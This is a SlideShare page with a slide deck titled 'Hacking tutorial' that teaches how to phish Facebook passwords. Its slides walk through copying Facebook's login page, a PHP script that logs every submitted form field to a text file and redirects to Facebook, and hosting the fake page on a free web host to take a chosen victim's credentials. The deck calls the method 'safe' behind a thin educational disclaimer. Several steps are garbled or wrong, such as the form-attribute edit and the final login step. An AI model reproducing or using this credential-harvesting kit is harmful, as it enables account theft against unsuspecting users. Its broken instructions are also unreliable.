SlideShare a Scribd company logo
1 of 11
Hamza Shahid Mirza – Certified Ethical Hacker
Please note that this tutorial is for educational purposes only. If you learn
anything from it, please do not use it for malicious attacks or any other type of
illegal activity.
If you already to know how to hack using the real programming and hacking
techniques then please don’t use them as you will get traced by the cyber security
almost instantly and it can get you in a lot of trouble.
Hacking is the art of exploiting computers to get access to otherwise unauthorised
information. Now that the world is using IT systems to gather, store and manipulate
important information there is also a need to make sure that data is secure. However, no
system is without its problems.
There are 3 types of hackers…White hat hackers, grey hat hackers and black hat hackers.
A white hat hacker breaks security for non-malicious reasons, perhaps to test their own security
system or while working for a security company which makes security software.The term "white hat"
in Internet slang refers to an ethical hacker.
A black hat hacker is a hacker who "violates computer security for little reason beyond maliciousness
or for personal gain". Black hat hackers form the stereotypical, illegal hacking groups often portrayed
in popular culture, and are "the epitome of all that the public fears in a computer criminal".[10] Black
hat hackers break into secure networks to destroy data or make the network unusable for those who
are authorized to use the network.
A grey hat hacker is a combination of a black hat and a white hat hacker. A grey hat hacker may
surf the internet and hack into a computer system for the sole purpose of notifying the
administrator that their system has a security defect, for example.They may then offer to correct
the defect for a fee.
Here you will learn how to hack without having any knowledge of programming. In other
words, you will learn to hack using “Phishing technique”.
Phishing is the method for hacking passwords. It makes the use of Fake Login Pages, also
known as spoofed pages.These fake login pages resemble the original login pages of sites
like Yahoo, Gmail, paypal, ebay and Facebook etc.
The victim is fooled to believe the fake facebook page to be the real one and enter his/her
password. But once the user attempts to login through these pages, his/her facebook login
details are stolen away.
It is a very basic technique and it doesn’t require any knowledge of programming. I’ve
already written a code that you are going to need so just follow the steps and you’ll be able
to call yourself a ‘hacker’.
Go to the normal facebook login page which is www.facebook.com
Right click on the page and click ‘View page source’.
This page will open in a new tab when you click ‘View page source’.
Press ‘Ctrl + A’ to select everything on the page and the ‘Ctrl + C’ to copy.
Open Notepad on your computer and paste the page that you copied by pressing ‘Ctrl +V’
Now click ‘Edit’ on the top left corner of the notepad and click the ‘Find’ option and the
‘Find box’ will open up.Type ‘action’ in the ‘Find what’ bar and click ‘Find next’ until you
find “action = http://www.facebook.com/login.php?”. Now select ‘action’ and change it
to ‘post’. So that’s what it should end up looking like: “post = =
http://www.facebook.com/login.php?”.
When you’re done, save it as login.html.
Now open a new notepad file and type this code there:
<?php
header ('Location:http://www.facebook.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?
This is the hacking code that I’ve written. Save it as code.php.
Now the final step is to create a phishing website. Go to 000webhosting.com (ooo is 3
zero’s).And sign up by creating a create a subdomain.
For example, www.mynewwebsite.com.
Now go to your file manage on the homepage on the website and upload the 2 files that
you saved on your notepad. i.e. Login.html and code.php.
You must know the email address of the person you’re going to hack. Now try to login with
their email address and leave the password section blank. Once you’ve done it, their email
and passsword will be shown on your filemanager on the phishing website that you just
created.
It’s a very basic and safe technique to hack someone’s profile. Hacking someone anonymously takes a
lot of programming skills and time. So that’s why I’ve shown you this technique because a lot of
people wonder ‘how to hack’.

More Related Content

Viewers also liked

Guitar lesson
Guitar lessonGuitar lesson
Guitar lessonizisiz
 
TYPES OF HACKING
TYPES OF HACKINGTYPES OF HACKING
TYPES OF HACKINGSHERALI445
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical HackingNeel Kamal
 
Computer Hacking - An Introduction
Computer Hacking - An IntroductionComputer Hacking - An Introduction
Computer Hacking - An IntroductionJayaseelan Vejayon
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern timesjeshin jose
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its typesSai Sakoji
 
Paging and Segmentation in Operating System
Paging and Segmentation in Operating SystemPaging and Segmentation in Operating System
Paging and Segmentation in Operating SystemRaj Mohan
 
Page replacement algorithms
Page replacement algorithmsPage replacement algorithms
Page replacement algorithmsPiyush Rochwani
 

Viewers also liked (12)

Guitar lesson
Guitar lessonGuitar lesson
Guitar lesson
 
Page Replacement
Page ReplacementPage Replacement
Page Replacement
 
Paging and segmentation
Paging and segmentationPaging and segmentation
Paging and segmentation
 
Hacking
HackingHacking
Hacking
 
TYPES OF HACKING
TYPES OF HACKINGTYPES OF HACKING
TYPES OF HACKING
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
Computer Hacking - An Introduction
Computer Hacking - An IntroductionComputer Hacking - An Introduction
Computer Hacking - An Introduction
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern times
 
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its types
 
Paging and Segmentation in Operating System
Paging and Segmentation in Operating SystemPaging and Segmentation in Operating System
Paging and Segmentation in Operating System
 
Page replacement algorithms
Page replacement algorithmsPage replacement algorithms
Page replacement algorithms
 

Similar to Hacking tutorial. (20)

Phishing attack
Phishing attackPhishing attack
Phishing attack
 
Introduction to Hacking
Introduction to HackingIntroduction to Hacking
Introduction to Hacking
 
Basic ethical hacking for seminar presentation
Basic ethical hacking for seminar presentationBasic ethical hacking for seminar presentation
Basic ethical hacking for seminar presentation
 
A presentation on Phishing
A presentation on PhishingA presentation on Phishing
A presentation on Phishing
 
Ethical hacking for Business or Management.pptx
Ethical hacking for Business or Management.pptxEthical hacking for Business or Management.pptx
Ethical hacking for Business or Management.pptx
 
Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)
 
Hacking & Hackers
Hacking & HackersHacking & Hackers
Hacking & Hackers
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Ethical hacking 2016
Ethical hacking  2016 Ethical hacking  2016
Ethical hacking 2016
 
Hacking
HackingHacking
Hacking
 
Kinds of hackers
Kinds of hackersKinds of hackers
Kinds of hackers
 
Information Security and Ethical Hacking
Information Security and Ethical HackingInformation Security and Ethical Hacking
Information Security and Ethical Hacking
 
Ethical hacking (2)
Ethical hacking (2)Ethical hacking (2)
Ethical hacking (2)
 
All About Hacking..!!
All About Hacking..!!All About Hacking..!!
All About Hacking..!!
 
All About Hacking.!!
All About Hacking.!! All About Hacking.!!
All About Hacking.!!
 
Ethical Hacking & Network Security
Ethical Hacking & Network Security Ethical Hacking & Network Security
Ethical Hacking & Network Security
 
10.a guide-to-facebook-security
10.a guide-to-facebook-security10.a guide-to-facebook-security
10.a guide-to-facebook-security
 
Hacking
HackingHacking
Hacking
 
Hacking
HackingHacking
Hacking
 

More from Ham'zzah Mir-zza (20)

Get started with hacking
Get started with hackingGet started with hacking
Get started with hacking
 
Activating windows 7 without actually buying the license key
Activating windows 7 without actually buying the license keyActivating windows 7 without actually buying the license key
Activating windows 7 without actually buying the license key
 
Hacking with a keylogger.
Hacking with a keylogger.Hacking with a keylogger.
Hacking with a keylogger.
 
E6 logo Animation
E6 logo Animation E6 logo Animation
E6 logo Animation
 
Ethical Checklist
Ethical Checklist Ethical Checklist
Ethical Checklist
 
Ethical Checklist
Ethical Checklist Ethical Checklist
Ethical Checklist
 
Ethical Checklist - E6 3D Logo
Ethical Checklist - E6 3D LogoEthical Checklist - E6 3D Logo
Ethical Checklist - E6 3D Logo
 
Production
ProductionProduction
Production
 
Final schedule 1
Final schedule 1Final schedule 1
Final schedule 1
 
Final schedule
Final scheduleFinal schedule
Final schedule
 
Final production log
Final production logFinal production log
Final production log
 
Fmp research1
Fmp research1Fmp research1
Fmp research1
 
3 d animation
3 d animation3 d animation
3 d animation
 
Gd02 collaboration agreement
Gd02 collaboration agreementGd02 collaboration agreement
Gd02 collaboration agreement
 
Project Charter
Project CharterProject Charter
Project Charter
 
Gd02 ethical checklist (1)
Gd02 ethical checklist (1)Gd02 ethical checklist (1)
Gd02 ethical checklist (1)
 
Pixel and resolution
Pixel and resolutionPixel and resolution
Pixel and resolution
 
Review
ReviewReview
Review
 
Figurative artists
Figurative artistsFigurative artists
Figurative artists
 
Fmp research1
Fmp research1Fmp research1
Fmp research1
 

Recently uploaded

How to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptxHow to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptxmanuelaromero2013
 
Proudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptxProudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptxthorishapillay1
 
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions  for the students and aspirants of Chemistry12th.pptxOrganic Name Reactions  for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptxVS Mahajan Coaching Centre
 
Meghan Sutherland In Media Res Media Component
Meghan Sutherland In Media Res Media ComponentMeghan Sutherland In Media Res Media Component
Meghan Sutherland In Media Res Media ComponentInMediaRes1
 
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTiammrhaywood
 
Types of Journalistic Writing Grade 8.pptx
Types of Journalistic Writing Grade 8.pptxTypes of Journalistic Writing Grade 8.pptx
Types of Journalistic Writing Grade 8.pptxEyham Joco
 
Full Stack Web Development Course for Beginners
Full Stack Web Development Course  for BeginnersFull Stack Web Development Course  for Beginners
Full Stack Web Development Course for BeginnersSabitha Banu
 
Roles & Responsibilities in Pharmacovigilance
Roles & Responsibilities in PharmacovigilanceRoles & Responsibilities in Pharmacovigilance
Roles & Responsibilities in PharmacovigilanceSamikshaHamane
 
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...Marc Dusseiller Dusjagr
 
Crayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon ACrayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon AUnboundStockton
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Celine George
 
Capitol Tech U Doctoral Presentation - April 2024.pptx
Capitol Tech U Doctoral Presentation - April 2024.pptxCapitol Tech U Doctoral Presentation - April 2024.pptx
Capitol Tech U Doctoral Presentation - April 2024.pptxCapitolTechU
 
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdfssuser54595a
 
Painted Grey Ware.pptx, PGW Culture of India
Painted Grey Ware.pptx, PGW Culture of IndiaPainted Grey Ware.pptx, PGW Culture of India
Painted Grey Ware.pptx, PGW Culture of IndiaVirag Sontakke
 
MICROBIOLOGY biochemical test detailed.pptx
MICROBIOLOGY biochemical test detailed.pptxMICROBIOLOGY biochemical test detailed.pptx
MICROBIOLOGY biochemical test detailed.pptxabhijeetpadhi001
 
Earth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice greatEarth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice greatYousafMalik24
 
Final demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptxFinal demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptxAvyJaneVismanos
 

Recently uploaded (20)

How to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptxHow to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptx
 
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Bikash Puri  Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Bikash Puri  Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
 
Proudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptxProudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptx
 
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions  for the students and aspirants of Chemistry12th.pptxOrganic Name Reactions  for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
 
Meghan Sutherland In Media Res Media Component
Meghan Sutherland In Media Res Media ComponentMeghan Sutherland In Media Res Media Component
Meghan Sutherland In Media Res Media Component
 
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
 
OS-operating systems- ch04 (Threads) ...
OS-operating systems- ch04 (Threads) ...OS-operating systems- ch04 (Threads) ...
OS-operating systems- ch04 (Threads) ...
 
Types of Journalistic Writing Grade 8.pptx
Types of Journalistic Writing Grade 8.pptxTypes of Journalistic Writing Grade 8.pptx
Types of Journalistic Writing Grade 8.pptx
 
Full Stack Web Development Course for Beginners
Full Stack Web Development Course  for BeginnersFull Stack Web Development Course  for Beginners
Full Stack Web Development Course for Beginners
 
Roles & Responsibilities in Pharmacovigilance
Roles & Responsibilities in PharmacovigilanceRoles & Responsibilities in Pharmacovigilance
Roles & Responsibilities in Pharmacovigilance
 
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...
 
Crayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon ACrayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon A
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
 
Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17
 
Capitol Tech U Doctoral Presentation - April 2024.pptx
Capitol Tech U Doctoral Presentation - April 2024.pptxCapitol Tech U Doctoral Presentation - April 2024.pptx
Capitol Tech U Doctoral Presentation - April 2024.pptx
 
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
 
Painted Grey Ware.pptx, PGW Culture of India
Painted Grey Ware.pptx, PGW Culture of IndiaPainted Grey Ware.pptx, PGW Culture of India
Painted Grey Ware.pptx, PGW Culture of India
 
MICROBIOLOGY biochemical test detailed.pptx
MICROBIOLOGY biochemical test detailed.pptxMICROBIOLOGY biochemical test detailed.pptx
MICROBIOLOGY biochemical test detailed.pptx
 
Earth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice greatEarth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice great
 
Final demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptxFinal demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptx
 

Hacking tutorial.

  • 1. Hamza Shahid Mirza – Certified Ethical Hacker Please note that this tutorial is for educational purposes only. If you learn anything from it, please do not use it for malicious attacks or any other type of illegal activity. If you already to know how to hack using the real programming and hacking techniques then please don’t use them as you will get traced by the cyber security almost instantly and it can get you in a lot of trouble.
  • 2. Hacking is the art of exploiting computers to get access to otherwise unauthorised information. Now that the world is using IT systems to gather, store and manipulate important information there is also a need to make sure that data is secure. However, no system is without its problems.
  • 3. There are 3 types of hackers…White hat hackers, grey hat hackers and black hat hackers. A white hat hacker breaks security for non-malicious reasons, perhaps to test their own security system or while working for a security company which makes security software.The term "white hat" in Internet slang refers to an ethical hacker. A black hat hacker is a hacker who "violates computer security for little reason beyond maliciousness or for personal gain". Black hat hackers form the stereotypical, illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal".[10] Black hat hackers break into secure networks to destroy data or make the network unusable for those who are authorized to use the network. A grey hat hacker is a combination of a black hat and a white hat hacker. A grey hat hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has a security defect, for example.They may then offer to correct the defect for a fee.
  • 4. Here you will learn how to hack without having any knowledge of programming. In other words, you will learn to hack using “Phishing technique”. Phishing is the method for hacking passwords. It makes the use of Fake Login Pages, also known as spoofed pages.These fake login pages resemble the original login pages of sites like Yahoo, Gmail, paypal, ebay and Facebook etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. It is a very basic technique and it doesn’t require any knowledge of programming. I’ve already written a code that you are going to need so just follow the steps and you’ll be able to call yourself a ‘hacker’.
  • 5. Go to the normal facebook login page which is www.facebook.com Right click on the page and click ‘View page source’.
  • 6. This page will open in a new tab when you click ‘View page source’.
  • 7. Press ‘Ctrl + A’ to select everything on the page and the ‘Ctrl + C’ to copy.
  • 8. Open Notepad on your computer and paste the page that you copied by pressing ‘Ctrl +V’
  • 9. Now click ‘Edit’ on the top left corner of the notepad and click the ‘Find’ option and the ‘Find box’ will open up.Type ‘action’ in the ‘Find what’ bar and click ‘Find next’ until you find “action = http://www.facebook.com/login.php?”. Now select ‘action’ and change it to ‘post’. So that’s what it should end up looking like: “post = = http://www.facebook.com/login.php?”.
  • 10. When you’re done, save it as login.html. Now open a new notepad file and type this code there: <?php header ('Location:http://www.facebook.com'); $handle = fopen("usernames.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "rn"); } fwrite($handle, "rn"); fclose($handle); exit; ? This is the hacking code that I’ve written. Save it as code.php.
  • 11. Now the final step is to create a phishing website. Go to 000webhosting.com (ooo is 3 zero’s).And sign up by creating a create a subdomain. For example, www.mynewwebsite.com. Now go to your file manage on the homepage on the website and upload the 2 files that you saved on your notepad. i.e. Login.html and code.php. You must know the email address of the person you’re going to hack. Now try to login with their email address and leave the password section blank. Once you’ve done it, their email and passsword will be shown on your filemanager on the phishing website that you just created. It’s a very basic and safe technique to hack someone’s profile. Hacking someone anonymously takes a lot of programming skills and time. So that’s why I’ve shown you this technique because a lot of people wonder ‘how to hack’.